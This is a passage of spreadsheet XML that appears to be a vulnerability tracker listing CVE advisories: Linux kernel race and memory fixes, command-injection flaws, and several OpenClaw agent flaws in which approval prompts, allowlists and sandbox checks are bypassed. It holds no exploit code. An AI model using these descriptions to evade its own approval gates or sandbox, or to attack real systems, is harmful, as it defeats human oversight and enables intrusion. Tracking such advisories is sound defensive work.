 __bnxt_poll_work+0x152/0x280
 bnxt_poll_p5+0x1cd/0x480
 __napi_poll+0x30/0x180
 net_rx_action+0x20b/0x3b0
 ? note_gp_changes+0x53/0xe0
 ? tick_setup_sched_timer+0x180/0x180
 ? __napi_schedule+0x9a/0xb0
 ? bnxt_msix+0x24/0x30
 handle_softirqs+0xdd/0x2c0
 __irq_exit_rcu.llvm.3171231171502365008+0x47/0xf0
 common_interrupt+0x85/0x90
 &lt;/IRQ&gt;
 &lt;TASK&gt;
 asm_common_interrupt+0x22/0x40
This stack trace is from a crash triggered when an out of bounds rx_tpa
is dereferenced. The invalid write mentioned above is silent in this
particular crash.
Fix this by allocating rx_tpa with bp-&gt;max_tpa rounded up to the next
power of 2 (bp-&gt;max_tpa_roundup_size) entries and masking the FW TPA ID
with that size, so the wrapped ID can never index past the end of the
array.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97570</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97573</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr"/>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Handle buffer allocation failure in bnxt_rx_ring_reset()
bnxt_rx_ring_reset() frees the ring buffers and then reallocates them,
ignoring the result.
bnxt_alloc_one_rx_ring() can fail in bnxt_alloc_one_tpa_info_data(), which
returns -ENOMEM on the first failed allocation and leaves the remaining
rxr-&gt;rx_tpa[] entries zeroed.
The error isn't propagated up, so the loop in bnxt_rx_ring_reset
continues and at the end the code re-enables TPA with partially
unallocated rx_tpa array.
This means that when the agg_id from hardware is mapped to a SW index in
rxr-&gt;rx_tpa[], an uninitialized slot can be chosen which would hand a
zero DMA address to the device.
Fix this by falling back to a global reset, which is what the existing
code already does when other functions fail, but unlike the other
failure cases this particular failure has to return because TPA can't
be re-enabled since the allocation failed.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97573</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97875</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>74b3a70d-cca6-4d34-9789-e83b222ae3be</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-350</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Rojo's "rojo serve" HTTP API (default port 34872) has no Host/Origin header validation, making it vulnerable to DNS rebinding. A malicious webpage can read all project source, write malicious code to files on disk, and launch local programs via opener::open() with no user interaction beyond visiting the page.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97875</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98069</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr"/>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire the fastpath locks in rds_conn_shutdown()
rds_conn_shutdown() quiesces the transmit and receive-refill paths by
waiting for RDS_IN_XMIT and RDS_RECV_REFILL to be sampled clear, and
then runs the transport shutdown and rds_conn_path_reset().  Sampling
the bits clear is not the same as owning them: the moment after the
wait_event() returns, rds_send_xmit() can re-acquire RDS_IN_XMIT (or
rds_ib_recv_refill() can re-acquire RDS_RECV_REFILL) and run
concurrently with the teardown.
The sender does recheck the connection state after taking the lock,
but that recheck is a classic store-buffering pattern: teardown writes
the state and reads the bit while the sender writes the bit and reads
the state.  acquire_in_xmit() is only an acquire operation, so on
weakly ordered architectures both sides can miss each other's write,
and the transmit path then runs while the transport zeroes its rings
(e.g. rds_ib_ring_init()) and rds_send_path_reset() rewrites the
transmit state under it.
Oracle UEK fixed the same class of crashes - a 14-year tail of
BUG_ON()s in rds_ib_sub_signaled(), unexpected op-codes and NULL
dereferences in rds_ib_send_cqe_handler() during failover testing -
by making the teardown path *acquire* the fastpath bit locks instead
of testing them ("rds: Make sure transmit path and connection
tear-down does not run concurrently").  Ownership of a single word is
decided by RMW atomicity, so no cross-variable ordering is needed.
Do the same here: take both locks before calling the transport
shutdown, hold them across rds_conn_path_reset(), and release them
explicitly with a wake-up afterwards.  Both are released with
clear_bit_unlock(), so that the ring re-initialization done by the
transport shutdown and the transmit state rewritten by
rds_send_path_reset() are ordered before either bit is seen clear by
the next acquire_in_xmit() or acquire_refill().
The fastpath users of these bits - rds_send_xmit() and
rds_ib_recv_refill() - are trylock style and back off while teardown
owns the locks, so no new lock dependency is introduced for them.
rds_tcp_reset_callbacks() is different: since the previous patch it
acquires RDS_IN_XMIT as well, and it blocks doing so, so its wait now
spans the teardown instead of at most one send batch.  That waiter
runs from rds_tcp_accept_one() on the single-threaded krdsd workqueue
and holds rds_tcp_accept_lock and t_conn_path_lock while it waits, so
a duelling SYN accepted while its path is being torn down parks
accept processing for the duration of the teardown - for TCP bounded
by the (up to 5 s) drain loop in rds_tcp_conn_path_shutdown().  An IB
path's drain in rds_ib_conn_path_shutdown() has no round cap, but no
blocking waiter either: rds_tcp_reset_callbacks() is the only blocking
acquirer of these bits and waits only on its own TCP path, and the
fastpaths are trylock-and-back-off on both transports, so a long IB
drain lengthens only that path's own quiesce.  The
window is narrow: the accept-side state check has to pass before the
teardown moves the path to RDS_CONN_DISCONNECTING.
Because krdsd is a single global workqueue, everything else queued
there - accept processing for other connections and network
namespaces, and the flush_workqueue(rds_wq) in rds_tcp_listen_stop()
during namespace teardown - waits behind the parked accept worker for
that time.  It cannot deadlock, although the waits do point at each
other: the teardown blocks until the bit's holder releases it, and
the holder may be that krdsd accept worker.  The holder finishes
without needing anything the teardown owns: the sync cancels
rds_tcp_reset_callbacks() issues target cp_send_w and cp_recv_w on
the path's ordered cp_wq, whose only execution slot is occupied by
the blocked cp_down_w itself, so they are pending at most and cancel
without flushing - a reliance on cp_wq being ordered that is now
noted next to those cancels (on 
---truncated---</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98069</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98070</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr"/>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire RDS_IN_XMIT in rds_tcp_reset_callbacks()
rds_tcp_reset_callbacks() quiesces the transmit path by setting the
path state to RDS_CONN_RESETTING and then waiting for RDS_IN_XMIT to
be sampled clear before swapping the underlying socket and calling
rds_send_path_reset().
Sampling the bit clear is not the same as owning it: rds_send_xmit()
can re-acquire RDS_IN_XMIT right after the wait_event() returns.  Its
state recheck after taking the lock is a store-buffering pattern (the
resetter writes the state and reads the bit, the sender writes the
bit and reads the state) and acquire_in_xmit() is only an acquire
operation, so on weakly ordered architectures both sides can miss
each other's write and the transmit path then runs concurrently with
rds_send_path_reset() rewriting cp_xmit_* state - which is exactly
what the comment above rds_send_path_reset() tells its callers to
prevent.
Take the lock instead, hold it across the socket swap and
rds_send_path_reset(), and release it with a wake-up at the end.  The
lock-ordering constraint documented above the wait still holds: the
lock is acquired before lock_sock(), so a sender inside tcp_sendmsg()
can never be waited on while we hold the socket lock.
Two details of the old code go away with the same change:
 - t_sock is now read only after the lock is acquired.  The old code
   cached it before waiting; the teardown in rds_conn_shutdown()
   releases that socket and clears t_sock, so a pointer cached before
   the wait can be stale by the time the accept path resumes.  Reading
   it under RDS_IN_XMIT is what makes the exclusion complete once the
   teardown owns the same lock, which the next patch arranges; until
   then the teardown still only samples the bit, and the two paths
   remain as exposed to each other as they are today.
 - The old !osock early path called rds_send_path_reset() with no
   serialization at all.  It now runs under the lock like the normal
   path.  The conditional RDS_CONN_RESETTING transition of the
   previous patch happens before the socket check either way: a path
   found without a socket is either still connecting (its reconnect
   worker blocked on t_conn_path_lock) and legitimately goes
   RESETTING -&gt; UP on the new socket, or it has been torn down
   meanwhile and is dropped.
The in-function comment describing the old wait-based quiesce is
rewritten to describe the lock-based one, and the stale block comment
above the function (which still described a return value and an
incomplete list of t_sock writers) is refreshed to name all four
writers - the connect, accept, teardown and swap paths - and what
serializes each of them.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98070</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98130</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr"/>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix a TOCTOU race in SCTP_CMD_TIMER_START
The SCTP_CMD_TIMER_START handler checks timer_pending() before calling
timer_reduce(). The timer can expire and detach between these operations,
causing timer_reduce() to rearm the timer without taking the association
reference required for the newly armed timer.
The timer callback later unconditionally drops its association reference,
which can leave the association reference count unbalanced and result in
use-after-free during association teardown.
Use the return value of timer_reduce() to determine whether the timer was
actually armed. Take the association reference only when timer_reduce()
successfully starts a new timer, closing the race between checking the
timer state and rearming it.
This issue was reported by Nico Yip (@_cyeaa_) working with TrendAI Zero
Day Initiative.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98130</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100559</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a command parser vulnerability where escaped newlines confuse exec allowlist parsing, allowing hidden commands to execute. Attackers can craft input with escaped newlines to bypass allowlist validation and execute additional commands without expected authorization prompts.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100559</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100561</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.22 and &lt; 2026.8.1 contain an approval-bypass flaw in the exec approval policy: the policy could trust a command-running wrapper without inspecting the command carried in its arguments. After an operator allowlisted or permanently approved a benign wrapper invocation, a later agent turn could substitute an arbitrary inner command and execute it with the OpenClaw process's host privileges without a further approval prompt. Exploitation requires the relevant wrapper to resolve on the host and a prior operator decision allowing that wrapper. Transparent shell carriers and opaque utilities such as process monitors, tracers, namespace tools, and proxy wrappers were affected through related trust-resolution gaps. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100561</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100585</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to enforce the owner-only authorization requirement for Claude Code permission prompts delivered through the MCP channel bridge. An authorized non-owner channel sender with channel command access can approve or deny a pending permission request intended for the owner, causing the requested action to proceed without owner consent. The practical impact depends on the pending action and the host capabilities requested by the Claude Code run. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100585</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100570</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>npm, python, rust</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 allow an untrusted workspace .env file to set the CLOUDSDK_PYTHON_ARGS environment variable. When an operator starts OpenClaw in attacker-controlled workspace content and then runs the Gmail setup flow, that value is inherited when gcloud is launched, and the gcloud launcher passes it as arguments to the trusted Python interpreter. A crafted CLOUDSDK_PYTHON_ARGS value can therefore cause Python to execute attacker-supplied code with the OpenClaw host user's permissions, allowing credentials to be read, files to be modified, or other processes to be started. This issue is fixed in version 2026.8.1; as a workaround, run Gmail setup only from trusted workspaces and clear inherited CLOUDSDK_* variables beforehand.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100570</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100597</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 is vulnerable to a time-of-check time-of-use race condition in OpenShell local mirror filesystem mutation operations. The remove, mkdir, and rename operations could act on a different filesystem target after OpenClaw completed its sandbox path-safety check, if the path is changed concurrently. An attacker able to win the race can cause a sandboxed operation to delete, create, or rename a host path outside the intended mirror root with the permissions of the OpenClaw process user. This does not require an operator to have granted host filesystem access outside the sandbox. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100597</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79153</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Seclore FileSecure Desktop Client before 3.25.1.0 contains improper access control vulnerability in the kernel-mode driver component that allows an authenticated local user to gain elevated privileges to NT AUTHORITY\SYSTEM on affected systems.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79153</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91837</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in NetworkManager-iodine, the iodine VPN plugin for NetworkManager. A local unprivileged user can exploit a vulnerability in how the 'nameserver' setting is processed when establishing an iodine VPN connection. By embedding shell metacharacters (special characters that can execute commands) in the 'nameserver' value, an attacker can inject and execute arbitrary commands. These commands run with root privileges before the application drops its elevated permissions, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91837</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91838</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
